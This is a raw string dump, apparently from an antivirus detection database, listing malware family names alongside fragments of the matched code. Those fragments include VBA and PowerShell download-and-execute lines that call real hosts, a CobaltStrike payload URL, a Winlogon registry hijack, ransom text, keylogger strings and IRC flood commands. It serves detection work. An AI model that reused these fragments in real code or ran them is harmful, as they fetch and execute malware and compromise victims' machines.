AgentTesla.TL!MTB )1~]Tm TrojanDownloader:O97M/EncDoc.PKM!MTB $TrojanDownloader:O97M/EncDoc.PKM!MTB Behavior:Win32/DllMsiexecInject.B .!Behavior:Win32/DllMsiexecInject.B Trojan:ASP/Webshell.PB!MTB Trojan:O97M/ZLoader.RJ!MTB Racealer.DA!MTB $4365bee4-1b24-4b5f-815e-d5408dea8639 OnScreenKeyboard.Properties.Resources DebuggingModes] Racealer.DB!MTB $519712d6-3c83-4b33-92b5-37f06995e528 $AAC9D1F6-E722-467C-8DAC-634967DB27FE SB.My.Resources FallbackManager.My.Resources !Ranumbot.RF!MTB eGlVXL Pjjjj DarkKomet.R!MTB !Stealer!MTB !SpyNoon!MTB !AveMaria!MTB !Spynoon.AVP!MTB TrojanDropper:O97M/Hancitor.EMLU!MTB %$TrojanDropper:O97M/Hancitor.EMLU!MTB & \"\\MsMp.dll\") = \"\" Then plop & \"\\MsMp.dll\") Call rnee(uuu, aaaa)] Agensla.GD!MTB http://myliverpoolnews.cf/liverpool-fc-news/features/ UserAgent: DownloadString] Rocke.A!MTB TrojanSpy:PowerShell/Stealer!MSR ' TrojanSpy:PowerShell/Stealer!MSR :\tdg& TrojanDownloader:O97M/EncDoc.RGEA!MTB %TrojanDownloader:O97M/EncDoc.RGEA!MTB 4htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby 74htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby TrojanDownloader:O97M/Obfuse.BB!MTB #TrojanDownloader:O97M/Obfuse.BB!MTB zzzzh_b64 = zzzzh_b64 & \"/lasdwe/bdaa3811-bb6c-42c7-ae25-0329f3a59ce1\", 436, zzzzh DynMemcpy alloc, zzzzh, hread, hwrite .ExpandEnvironmentStrings(\"%TEMP%\") & \"\\cym_16001380430BD84B24.exe\" Based = Based & hcffgfawrenm( & Chr$(Val(\"&H\" & Mid$( , 2))) = kuQWG9Jl(UserForm1.Label1.Caption) .Environment(\"process\").Item(\"param1\") = .run \"cmd /c call %param1%\", 2 = Split(afterBool, \"#\") c:\\\\users\\\\public\\\\nameTpl.h Optional refCnt = \"t\", Optional lBDocument = \"a\") = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument] !SelfDel.V!MTB axq,Ng Trojan:Win64/CryptBanker!MTB Trojan:Win64/CryptInject.V!MTB Asyncrat!MTB Ransom:MSIL/Cring.DA!MTB your network is encrypted Crypt3r @tutanota.com killme.bat killme.bat] !Stelega.DE!MTB 
Ftbi}oMeakBqabzzrA Ftbi}oMeakBqabzzrA] !QQPass.DA!MTB KLJEWERHsdwqeh23211!@asdqSADwe BRESUZCDY.jpg wahaha wahaha] Trojan:AndroidOS/FakeApp.K!MTB Lcom/wagd/gg/MyService; /update/update.conf load64Data bytes getThisAppArch MobclickRT  /system/app/Kinguser.apk TrojanDropper:O97M/Donoff.PK!MSR % TrojanDropper:O97M/Donoff.PK!MSR = \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" F= \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" = \".\" & \"e\" = writeToFile(p & \"b.doc\", tOut)  = writeToFile(p & \"b.doc\", tOut) = \"x\" & \"e\" = publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash J= publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash = StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) ]= StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) Behavior:Win32/Chadivendo.A Lnet start !Chadivendo.STE ServiceResponce.dll ServiceResponce.dllServiceMain !Chadivendo.STF  %08x.txt TrojanDownloader:O97M/IcedId.MR!MTB #TrojanDownloader:O97M/IcedId.MR!MTB Behavior:Win32/ModMon Behavior:Win32/SystemMiner.A --donate-level AgentTesla.OXAT!MTB TrojanDownloader:O97M/IcedID.RVN!MTB $TrojanDownloader:O97M/IcedID.RVN!MTB \"c:\\progra\", Optional   = \"ta\" ((\"explorer \") Split(ActiveDocument.Range.Text, \"x\") & \"mdata\\  .h\" & Print #1,      out & Chr(arr(cnt) Xor 100) TrojanDownloader:O97M/Obfuse.RVW!MTB $TrojanDownloader:O97M/Obfuse.RVW!MTB ddzdqsdff() & \"\\\" + rmlkejgmlkdfjgri(2) + \".exe\" PxPToxhq.Open \"GET\", sdqsldjkf, False slkfjdfjhglkjdshze.Run XxX, 1, True str & Mid(LETTERS, Int(strLen * Rnd + 1)) str & Mid(LETTERS, Int(strLen * Rnd + 1))] TrojanDownloader:O97M/Donoff.MXT!MTB $TrojanDownloader:O97M/Donoff.MXT!MTB \"HTTPDownload 'http://1lxtjdias-pod:8080/stage3.exe' CreateObject (\"; Scripting.FileSystemObject; \") Wscript.CreateObject 
(\"; Wscript.Shell; \") \"WshShell.Run strFile\" FolderExists(Left(path, InStrRev(path Shell \"wscript C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\"] !Konus.SG!MTB data_inject [TAB] [DELETE] [BACKSPACE] [RETURN] F3P7Y6P3U3E2U5F3 P4Y7T7R7R8X3E3A3 D3S0A7R4F6C8F2R5   :Zone.Identifier profiles.ini B \\Google\\Chrome\\User Data\\Default\\] !Konus.SH!MTB C3E0Q6R7F1H2G5A4 https://api.ipify.org/ ?a=3 ?a=3     explorer.exe] Behavior:Win32/DridexDllPreload.A .!Behavior:Win32/DridexDllPreload.A @!\\syswow64\\ @!\\system32\\ Behavior:Win32/DridexDllPreload.B .!Behavior:Win32/DridexDllPreload.B !Salgorea.A!MTB !Spynoon!MTB !Predator.SS!MSR !Predator.AR!MSR !Predator.PJ!MSR NanoBot.RKC!MSR !Tnega.AL!MTB ZJ:2 u f k,J !Obfuse.MXR!MTB dimmdpe, mdpe=\"krbgdwdtjonzpcmditsbquporkyvowsjggzrmtm\"setmdpe=createobject(\"microsoft.xmlhttp\") =\"https://pjoao1578pro2.site/crypt/vbscript.txt\"mdpe.open\"get\", ,falsemdpe.send\"\"execute(\"execute(mdpe.responsetext)\") Ransom:Win64/DelShad!MSR !Borhieda.STA Processcurb.A!MTB Trojan:Win64/CobaltStrike.STB Trojan:Win64/CobaltStrike.STB\t@ 8+Veb~ !Lokibot.RV!MTB !Obfuse.RA!MTB pjoao1578pro2.site/crypt/vbscript.txt 3pjoao1578pro2.site/crypt/vbscript.txt  Ohttps:// Processcurb.A1!MTB startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash @startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash Processcurb.A2!MTB echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm ?echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm APhish.VS!MSR window.frames['load-url'].location='http://r3.o.lencr.org/' =window.frames['load-url'].location='http://r3.o.lencr.org/' !CobaltStrike!MSR http://185.225.19.240/dmenconsvc.dll &http://185.225.19.240/dmenconsvc.dll Trojan:XML/ObfInject!MTB TrojanDownloader:O97M/TrickBot.RTS!MTB &TrojanDownloader:O97M/TrickBot.RTS!MTB !Empire.B eMicrosoft Loader] !Banker.SE C:\\TEMP\\\\ 0KC:\\Documents and Settings\\ \\Local 
Settings\\Application Data\\amb0 Banker.D !VB.AEE !Delf.JJ !Pidief.CI !Pidief.CJ !Pidief.CK aOpenStream.AP !VBInject.NG !VB.LP Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp ,'Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp !Startpage.NT [*9\"< !VB.AEF \\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp 3.\\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp !QQpass.DZ !Agentsmall.F C0\t\t8  C0\t\t8  C0\t\t !Agentsmall.G !Agentsmall.H C0\t\tz  C0\t\tz , C0\t\t !Delall.D !QQpass.CJA !Slefdel.C !Murlo.R !Murlo.N !Murlo.Q !Startpage.ACA !Startpage.ACB !QQpass.CIB !OnLineGames.ZEC ]GB}n !VB.YAI !VB.YAL !OnLineGames.ZEE!dll ~f]yu !VB.YAC fSM/N. -j'@d !FakeMS.C -uzf-- !Delf.ZXA !OnLineGames.AAE !Startpage.YG !Delf.ZXB Hh4c@ kA.-\t !VB.AEZ !VB.YAJ )o}a: !Zhbin.A !Startpage.YF Startpage.C Startpage.D !Startpage.AB 8CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\ShellFolder #WshShell.CreateShortcut(Favorites & J\\In\"&\"t\"&\"ern\"&\"et Expl\"&\"or\"&\"er\\M\"&\"a\"&\"i\"&\"n\\S\"&\"t\"&\"ar\"&\"t P\"&\"a\"&\"ge\" 1\\Wi\"&\"nd\"&\"ows\\C\"&\"urren\"&\"tVers\"&\"ion\\R\"&\"u\"&\"n\\ /f/q/a del \" \\Internet*.*\" 1nkfile\\shellex\\IconHandler 1nkfile\\shellex\\IconHandler] !Agent.EK open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ 9open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ !Agent.EL open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open >open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open !Cosmu.A !DyCode.C !Webnav.A!dll :\\windows\\system32\\index.html 360seURL\\shell\\open\\command :\\Program Files\\wisesoft\\ htmlfile\\shell\\open\\command Explorer\\iexplore.exe\" \"%1\" \\wisesoft\\config.ini \\wisesoft\\config.ini] !Banker.XO </B><SPAN id=bank-name> BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s *BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s %s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s )%s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s] ip.hetodo.com:8754/ip.php .hetodo.com:8080/sogouconfig/click_new_ '.hetodo.com:8080/sogouconfig/click_new_ 
/count.asp?mac=%s&ver=%s /count.asp?mac=%s&ver=%s] !Morix.B !Morix.B\t@ !Morix.C !Mulcss.A <$ t! %SystemRoot%\\System32\\svchost.exe -k $%SystemRoot%\\System32\\svchost.exe -k sc config UI0Detect start= disabled #sc config UI0Detect start= disabled SOFTWARE\\ODBC\\SQLLevel SOFTWARE\\ODBC\\SQLLevel] NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb +NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb !FakePlayer.B vnetservices.l0086.com.cn \\NethomeInfo\\MyIEData\\main.ini \\NethomeInfo\\MyIEData\\main.ini] !OnLineGames.ZEA!dll /t.asp C:\\mxdos.sys C:\\mxdos.sys] !Startpage.ZA zhenlaji tongji.aectime.com/api/ 117.40.196.202/tj7/count.asp?mac= 114search.118114.cn/search_web.html? dianxin.online.cq.cn/api/taobao/index.htm] !OnLineGames.ZDX!dll up/Upf.asp %s%s?ac=h&i=%s&h=%s %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d] !QQpass.CIA d:\\sys.txt d:\\Txs.dll mm2020.usa20.ceshi6.com/SPOP/DXBPVQ/user.asp?username= &op_type=add&submit=ok &op_type=add&submit=ok&a2=&a1=&password=] !OnLineGames.ZDM!dll ?a=%s&s= &u=%s&p=%s&r=%s& &u=%s&p=%s&r=%s&] !OnLineGames.ZDV!dll /mibao.asp %s?act=&d10=%s&d80=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d] !Delf.ZSA .xz19.com ctfmon_ kuodousetup38_ CnIE.tmp cn.tmp  cn.exe !OnLineGames.ZED!dll %s?act=getpos&d10=%s&d80= ?a=%s&s=%s&u=%s&p=%s&pin=%s& wsidny.asp wsidny.asp] !VB.YAK kaoti.exe ahui.exe, 0 \t(C:\\WINDOWS\\system32\\ c.greenclick.cn/click?pid=23&mid=19483&channel=2&pt=df] !VB.YAB \\Hijack.exe nResurrection.bat .18286.net/?xin NaNianHuaKai] !Xwxia.A \\npdrmv.jpg\" /q /f %MYFILES%\\coopen_setup .zuihouyi.com/ a.xwxiazai.com/ .07396.com/ .07396.com/] !Inbat.A %MYFILES%\\Upd.exe %MYFILES%\\in.exe //www.xunlei100.com/msn/ //install.xinruicn.com //to2.5cnd.com/ //a.xwxiazai.com/ /bibibei /coopen_setup_ pipi\\unins000.exe\" /f  /DDHYT.exe  /pipi_dae_ /kugou_  /36a11.exe  /36a11.exe] !Kplo.A jjjjjjjh \\lpk.dll  LpkInitialize LpkInitialize] !Startpage.AEJ 
.k969.com P-ba4f-00a0c91eedba}\\Shell\\Start\\Command\\ ,\\iexplore.exe\" http:// lore.exe,-32528 L\\Desktop\\NameSpace\\{1f4de370-d627-11d1 $a}\\LocalizedString] !Hupigon.ZAI fUCK_AVP MyLive \\pbk\\rasphone.pbk \\perfc008.dat  [%d/%d/%d %d:%d:%d] BITSServiceMain BITSServiceMainx MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58= HAHHHH MmM0bV1uKjhdTTQ3ZXM1PD5Anw==@3QLz4PEC/vMCvQP7+58=HAHHHH SOFTWARE\\mICRosOFT\\wINDoWs nt\\cURrENTvERsIoN\\sVcHosT %s:\\DoCumEnts And SetTinGs\\LocalSeRVice %s\\%d_Index.TEMP %s\\%d_Index.TEMP] !Hupigon.ZAJ \\teslortnoctnerruc\\ \\server.exe 36%xsvc 36%xsvc] !Hupigon.ZAK Xmfy] TQ*zR 0etVolumeInformation GT_Update \tGT_Update \\Gh0st %d \t\\Gh0st %d %s:\\Documents  ONS\\IExPLoRE.EXE\\SHelL\\ ONS\\IExPLoRE.EXE\\SHelL\\] !Agent.ABGI uRfNR Zg&uRfNR !Boaxxe.L !Delf.CO KeySpyXP KeyWord.Scroll_Lock {NUMPAD DIVIDE} DJ Mentos Motyl.exe Motyl.exe] Ransom:Win32/LockScreen.AS /c REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /t REG_SZ /d \"C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Administrator\\ 0-9.EXE\" /f !Small.DJ $lsass.exe Fail To create Snap Shot $lsass.exeFail To create Snap Shot Is GodMode: Fail Error! 
root$  !Delf.KM !GameHack.C .+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp 1,.+:\\\\.+\\\\Desktop\\\\Yeni Klas.+\\\\Project1.vbp !CeeInject.gen!DY !Sinowal.AHD !Pinkblocker.gen!A  $0 *0 !VB.CR !VB.CR[@ !VB.LU createobject(\"winhttp.winhttprequest Xcreateobject(\"winhttp.winhttprequest _.open\"get\", _g/\"&\"c3\"&\"s7\"&\"z\",false _execute Keylogger.HB!bit watchwinsp.org/v2.txt shutdown /s /t 0 sendActiveEmail sendActiveEmail] VirTool:Win64/Drixed!rfn Puwin.A TrojanDownloader:PowerShell/Cobelatt $TrojanDownloader:PowerShell/Cobelatt tvpbulv\"+\"iievigewgaaaasi0d6v///0ibwzblaqd/00ijw0mj+ggeaaaawv/qqbjwtajwaauaaaba/9ma8aaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaaawg2zrunocufj6arhsegk4o7znuhz6arijvmy4khocuko8z7hyegk4njtqump6arhbapg4xxocufj6a7idegk4njtmuhj6arg0lmi4u3ocudsuy7htegk4njtoufn6arhsawnounocuaaaaaaaaaaaueuaagsgbgboptxxaaaaaaaaaadwacigcwilaabiagaasaiaaaaaaac Gendwnurl.BE!bit jbdsicoio http://img-save.xyz HKEY_CURRENT_USER\\Software\\Classes\\steam\\Shell\\Open\\Command] Gendwnurl.BJ!bit http://47.89.187.54  .rar C:\\TEMP /k DownloadFile] Gendwnurl.BK!bit http://ckpetchem.com entrypoint invoke !Tinba.H!bit 83\":f6 !SpyEyes !Cowmf.A !VBCrypt.A Virus:Win64/Expiro.EN!bit QRGUJ AUAVAWH !Zuepan.A application/xhtml+xml %s%08x.%s /c start \"\" \"%s\" 88C3D173715405943DF9AA0DA0C9893B BD75476FE8B74F9F2EF73E9128F946F5 !Jscrpt.A!bit !Farfli.PN!bit TCPConnectFloodThread.target http://119.249.54.113/ HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0] !Swotter.A!bit !Swotter.A!bitD@ k<-OrZ  NDXag S(iKOrZ S~,`|  vwM@x oe Wb~ !CeeInject.RT!bit That plumber lent her a lot of money Joe struck him a heavy blow That guard sold him a ticket That journalist showed them a photograph That carpenter struck him a heavy blow Lesters ex-wife orders her a new hat Willie bought her a gift Jackie strikes him a heavy blow Stephen struck him a heavy blow Those police officers offered her a ride home That student saved her a seat Betty gives him 
a magazine Ed ordered her a new dress Abraham gives him a magazine Those scientists told her the shortest way Miss Johnson envied him his good fortune That janitor shows them a picture Abraham brought her a small present Debbie taught them English Ned sends him a package Those taxi drivers make him some coffee That manager read the children a story That teacher wrote her a letter Albert lends him a pencil Ann Lynn sent him a package Willie bought her a gift Joannes mother offers her a bribe Those science teachers buy her a gift Joannes mother offers her a bribe Those science teachers buy her a gift] !Skeeyah.A.bit I\tNLGB !CeeInject.SB!bit !Kryptik.FZTF ;* 'C !Azden.A !Kuiper !WebOpen.A !Totecx Ransom:Win32/Crypren Trojan:O97M/Bailiwick.B CoinSteal.A!bit bytecoinwallet.wallet CryptoService.pdb dsciuyizhiuuc.php?type=] !Kasidet.G!bit Xl5jVVxcVWIx CoinMiner.KA!bit !CoinMiner.OS!bit !Turla 2-'1Y !VBRan Ransom:MSIL/WannaPeace.A C}+x{ !Pynamer.B!ac  ]a eg Jw# !Pynamer.A!ac % G+r 6 {l> ** *M'*^Y RUxp    IqV :pqK= Y.+uO V1r-28 |zO-0  nqbhg /H (z\" /H [4 ' GvU h> rZ 10feW !Plimrost fileinstall(\"encrypted.data\",@tempdir&\"\\ 0\",1)$  =fileread(@tempdir&\"\\ 0\")global$ P=_base64decode($  ,\"\",@scriptfullpath) TrojanDownloader:PowerShell/Falsip.B $TrojanDownloader:PowerShell/Falsip.B !Schopets.O Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile)&(SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:Schopets!ReverseWscriptShell)] !Schopets.OB InEmail&AGGR:SingleVBSInArchive&Nscript:Type_vbs&(SCPT:VBS/Obfuscator.Split.Adodb.A|SCPT:VBS/Obfuscator.Split.FileSystemObject.A|SCPT:TrojanDownloader:VBS/Schopets!SaveToFile|SCPT:VBS/Obfuscator.Reverse.ResponseBody|SCPT:Schopets!ReverseHttp|SCPT:Schopets!ReverseXmlHttp|SCPT:Schopets!ReverseAdodbStream|SCPT:VBS!Obfuscator.Split.CmdExe)] CoinSteal.B!bit VictimLogs 
BitcoinWallet SendUrlAndExecute get_Screenshot get_Screenshot] Nekozillot.A!bit \\AppData\\Local\\Amigo\\User Data\\Default\\History http://zillot.kz/System/mysql/users.php regsetauto RisingForce2] SupportScam:MSIL/Payreen.A Q F/] 3\tN@U Q F/] Q F/] Trojan:Win64/CoinMiner.OT!bit !Gendelfan.F!bit Trojan:Win64/Wdfload.M!bit CoinMiner.OU! Elkcro.A Erebus Final Final\t@ Firhel.A Flood.AU Flood.BR Flood.C Flood.DH Flood.E Flood.F Flood.G Flood.I Flood.P Flood.T Flood.V Flood.W Flood.X +0UOu Froze Girc.17 Girc_181.A Goodbot Grimgram Hetrad Iblis Iland.A Informa.A InSpic Iover.A Iroffer Jerret.A Jerret.D Judge sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 <sockwrite-nsockcloneprivmsg%jd.dachan:3,1doneudpflooding$2 Karmahotel Lambot.A Lamebot Menak Mesut Mimic Mimic.C Mimic.E Mimic.F n2=msdossettings.inin3=fatsys.inin4=namesserver.ini 5n2=msdossettings.inin3=fatsys.inin4=namesserver.ini r4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} xr4ndom.server{return$gettok(irc.nitro.net:irc.dal.net:irc.austnet.org:irc.webchat.org:irc.infatech.net,$rand(1,5),58)} Mircer.A Momma Momma.A Momma.A\t@ ={Quu ={Quu( Momma.C //run$mircdir$+winsok .sockwrite-ndlgethttp://$+%usite2$+/$+%fileini 0.sockwrite-ndlgethttp://$+%usite2$+/$+%fileini Momma.D , ^B|7 Movie.A Moyt.A Moyt.B Mutin.A Muzik Niqim Noclose n0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null Gn0=/join#![0wn3d$chr(36)$+nulln1=/timer060/join#![0wn3d$chr(36)$+null {?<D] PPack Randon.AE Randon.L Randon.S Regie.A Reklam.A Reklam.C Reklam.D Reklam.E Reklam.F Reklam.I Sensi.11 Shiznat.C Sipg.A Slowdown Smev.B Speed.A Tawb.A Temper Thea.A Thorin.11932 Tkbot Trilissa.J Tzet.A Upaga Whisper.A AAssign 0oUOo AAssign.A ABizex.A ABlast.A ABomgen.B ]5JW ABomgen.C ABomgen.D ABomgen.E ABomgen.P AChango ACobase.A AConcon tYg&`i ADavinia ADriveFormat.A ADropperAppl.A AFakehost AFofiv.A AGhostdog.A AHTADropper.A AIestart.E AInformer AInor AInor.AR 
AInor.BB AInor.BE AInor.BL CIwillbased AKillfiles.B ALooper.B ALooper.D AMarfan.A AMimail.R ANyrobot.A AObjdata AParams.D APaula APsyme.N ARapa AResizer.A ARunner.A ASeeker.C AShowhelp.A ASmall ASmall$@ I1(C\t `sg&| Gx1wbJPv ASmall.A ASmall.D ASmall.F ASpthgen AStartpage.F ATalkStocks.A AVBSWG.C AVoodoo.A AVoodoo.C AWhitehome AWindowbomb.C AWipe.A AZivaExploit Trojan:ABAP/Cadabra DoS:ABAP/Delan.A Trojan:ABAP/Delins.A Worm:ABAP/Rapid.A Backdoor:ABAP/Rivpas.D !SerialThief Virus:ALisp/Pobresito.A Virus:ALisp/Bursted.A Virus:AmiPro/Amiv Trojan:ANSI/Bart Trojan:ANSI/Spehelp Monster.6109 Backdoor:ASP/Ace.B Backdoor:ASP/Ace.C Backdoor:ASP/Ace.D Backdoor:ASP/Ace.F TrojanDropper:ASP/Cobase Backdoor:ASP/Sql Backdoor:ASP/Uxor.A Trojan:ASX/Conp SillyTroj Worm:BAS/Alba  Trojan:BAS/Alpha.A Virus:BAS/Bv3 * TrojanDropper:BAS/Clobus.A Worm:BAS/Craytron Worm:BAS/Junkrem Worm:BAS/Trash.A Virus:BAS/Xyc * Trojan:CorelScript/CST.A Virus:CorelScript/CSV.A Trojan:CorelScript/PVT.A !IISCmd Block Block.A Trojan:HC/BangSpice.A Trojan:HC/HC_9603.A Trojan:HC/MerryXmas.A Backdoor:HE/Flys.A Trojan:HE/Flys.B Exploit:HTA/Behind.A Exploit:HTA/Showhelp Exploit:HTA/Wareme.A Virus:HTML/Abbum.A Exploit:HTML/Ability Trojan:HTML/Alcaul.F Worm:HTML/Alcaul.M Worm:HTML/Alcaul.Q Exploit:HTML/AnyMail TrojanDownloader:HTML/Balder.A TrojanSpy:HTML/Bayfraud.A Virus:HTML/Blowup Trojan:HTML/Briss.A Trojan:HTML/ByteVerify.A Trojan:HTML/CardStealer Trojan:HTML/Citifraud.A TrojanSpy:HTML/Citifraud.I = Asc(Mid(  Mod Len( + Sheet2.Range(  + CStr( )).Value , \".\") , \"::\") = ThisWorkbook.Name Print #1, = \"\"] !Bynoco!lnk Exploit:Win64/Revsell.A cmd.exe%s%s Ransom:Win32/Maze.Q!MSR Killyourself.dll wchCrypt32 dwShellCodeSize TrojanDownloader:AndroidOS/Banker!MSR %TrojanDownloader:AndroidOS/Banker!MSR TrojanSpy:AndroidOS/Fakecop!MSR Exploit:AndroidOS/Lotoor.A!rfn !Keylogger.AA!MSR !Downloader.AU!rfn TrojanDownloader:O97M/Obfuse.AA!MTB #TrojanDownloader:O97M/Obfuse.AA!MTB = CreateObject(\"Scripting.FileSystemObject\") 
Wicmd.CreateFolder \"C:\\pic1\\\" = \"C:\\pic1\\Build16.cmd\" \"start c:\\pic1\\ PreviewPreview2.exe\" TrojanDownloader:PowerShell/Elshutilo.AJ!MTB ,TrojanDownloader:PowerShell/Elshutilo.AJ!MTB Replace(f1, \"/\\\", \"2\")) Replace(\"Pow#&*$%ell\", \"#&*$%\", \"ersh\")) Application.ExecuteExcel4Macro (  + \"\"\"\" +   + \"\"\"\" + \", \" + \"\"\"\" +   + \"\"\"\" + \", \"\"\"\", 0)\") TrojanDownloader:PowerShell/Elshutilo.PS!MTB ,TrojanDownloader:PowerShell/Elshutilo.PS!MTB Dim si As STARTUPINFO Ret3 = Environ$(\"APPDATA\") + \"\\pay1.ps1\" Ret2 = URLDownloadToFileA(0, \"http://kredytinksao.pl/raw.txt\", Ret3, 0, 0) Ret2 = URLDownloadToFileA(0, \"http://wpr.mko.waw.pl/uploads/scheduler.txt\", Ret3, 0, 0) Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi) Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)] !CryptInject.SK!MTB 307835333734373236393645363735323635373636353732373336353238323436343239 30783434364336433533373437323735363337343433373236353631373436353238323236323739373436353230 0x40486f6d654472697665202620225c5c5c5c57696e646f77735c5c5c5c4d6963726f736f66742e4e45545c5c5c5c4672616d65776f726b5c5c5c5c ( $URL , $PATH ) = STRINGREPLACE (  ( $FILE , $STARTUP , $RES , $RUN = 3078343636393643363534463730363536453238 = \"WriteProcessMemory = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" ) = STRINGREGEXPREPLACE ( $SITEM , \"^Row\\s\\d+\\|(.*)$\" , \"$1\" )] !Delpem.A!cry SIGATTR:DelphiFile&HSTR:DelphiPacker.A] *&SIGATTR:DelphiFile&HSTR:DelphiPacker.A] Empyre.D!MTB TrojanDownloader:O97M/Obfuse.LHO!MTB $TrojanDownloader:O97M/Obfuse.LHO!MTB TrojanDownloader:O97M/Obfus.B!MTB !TrojanDownloader:O97M/Obfus.B!MTB (\"wscript //nologo c:\\Colorfonts32\\visitcard.vbs  @ c:\\Colorfonts32\\secpi15.exe start c:\\Colorfonts32\\secpi15.exe LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0 
LoadScriptVBS GetObject(HashTable()), \"c:\\Colorfonts32\\B4D9D02119.cmd\", 0] TrojanDownloader:O97M/Macrobe.BD!MTB $TrojanDownloader:O97M/Macrobe.BD!MTB cvcviagens.sslblindado.com/ htahtml\" var0 = \"MSHTA https://  :var0 = \"MSHTA https:// Shell (Var) Shell (Var)] Trojan:HTML/Phish.L!MTB tmss-ict.com/include/result.php\"> Itmss-ict.com/include/result.php\"> <formmethod=\"post\"action=\"https://  C<formmethod=\"post\"action=\"https:// ARedirector.BD!MTB a-z=0; a-z.length; 0-9;if(( a-z)==true)&&( 0-9)&&( )==false)){ a-z=eval( !MemoryInjection.A!MTB !Pydcrypter.A!MTB AKoadicPersist.A case0x80000001 ;case0x80000001 k0adic 0regdelete p%appdata%\\\\  .hta\" Trojan:Python/Febrev.A importmarshal cs=s@*ket.s@*ket(s@*ket.af_inet,s@*ket.sock_stream) gs.re*v(2048) kw?n32.^rz2 ire]zy=@]en(\\'w?n32.^rz\\',\\'r+\\') n*urrent_q?r=(@s.!et*wq()) urrent_user+*urrent_q?r !Splinter.A!MTB sliverpb.NetInterface sliverpb.WGSocksServer sliverpb.PortfwdProtocol sliverpb.WGTCPForwarder .sliverpb.RegistryType .sliverpb.RegistryTypex sliverpb.Register.ActiveC2 sliverpb.KillSessionReq sliverpb.Register.PidPid sliverpb.IfconfigReq sliverpb.TerminateReq sliverpb.NetInterfaces sliverpb.NetInterfacesx /xc/load.go main.bake syscall/zsyscall_windows.go *sliverpb.Process *sliverpb.  Info *sliverpb.Migrate *sliverpb.Elevate *sliverpb.Kill *sliverpb.DNSPoll *sliverpb.DNSBlockHeader *sliverpb.ExecuteAssemblyReq *sliverpb.ImpersonateReq *sliverpb.ImpersonateReqxz ).GetPid ).GetFilename ).GetActiveC2 ).GetVersion ).GetReconnectInterval ).GetProxyURL ).GetExecutable ).GetOwner ).GetSessionID ).GetCmdLine ).GetTargetLocation ).GetReferenceDLL ).GetTargetDLL ).GetProfileName ).GetUsername ).GetPassword ).GetDomain ).GetRequest ).GetProcessName ).GetArgs ).GetEntryPo